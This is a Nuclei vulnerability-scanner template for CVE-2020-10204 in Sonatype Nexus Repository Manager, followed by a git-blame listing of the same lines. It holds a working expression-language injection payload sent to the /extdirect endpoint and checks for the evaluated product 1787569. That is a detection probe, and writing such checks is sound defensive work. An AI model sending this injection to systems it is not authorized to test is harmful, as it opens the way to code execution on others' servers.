nuclei-templates/cves/CVE-2020-10204.yaml

id: cve-2020-10204

info:
  name: Sonatype Nexus Repository RCE
  auhtor: hetroublemakr
  severity: high
  description: A Remote Code Execution vulnerability has been discovered in Nexus Repository Manager requiring immediate action. The vulnerability allows for an attacker with an administrative account on NXRM to execute arbitrary code by crafting a malicious request to NXRM
  # reference: https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31

requests:
  - method: POST
    path:
      - '{{BaseURL}}/extdirect'

    body: '{"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{1337*1337"]}],"type":"rpc","tid":28}'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "1787569"
        part: body
      - type: status
        status:
          - 200
Normalized id fields to match schema regex 2020-09-15 19:25:55 +00:00			`id: cve-2020-10204`
Create CVE-2020-10204.yaml 2020-07-06 20:24:18 +00:00
			`info:`
			`name: Sonatype Nexus Repository RCE`
			`auhtor: hetroublemakr`
			`severity: high`
description 2020-08-25 22:52:00 +00:00			`description: A Remote Code Execution vulnerability has been discovered in Nexus Repository Manager requiring immediate action. The vulnerability allows for an attacker with an administrative account on NXRM to execute arbitrary code by crafting a malicious request to NXRM`
Update CVE-2020-10204.yaml 2020-07-07 06:19:48 +00:00			`# reference: https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31`
Create CVE-2020-10204.yaml 2020-07-06 20:24:18 +00:00
			`requests:`
			`- method: POST`
			`path:`
			`- '{{BaseURL}}/extdirect'`
Update CVE-2020-10204.yaml 2020-07-07 06:19:48 +00:00
Create CVE-2020-10204.yaml 2020-07-06 20:24:18 +00:00			`body: '{"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{1337*1337"]}],"type":"rpc","tid":28}'`
Update CVE-2020-10204.yaml 2020-07-07 06:19:48 +00:00
Create CVE-2020-10204.yaml 2020-07-06 20:24:18 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
			`- "1787569"`
			`part: body`
			`- type: status`
			`status:`
description 2020-08-25 22:52:00 +00:00			`- 200`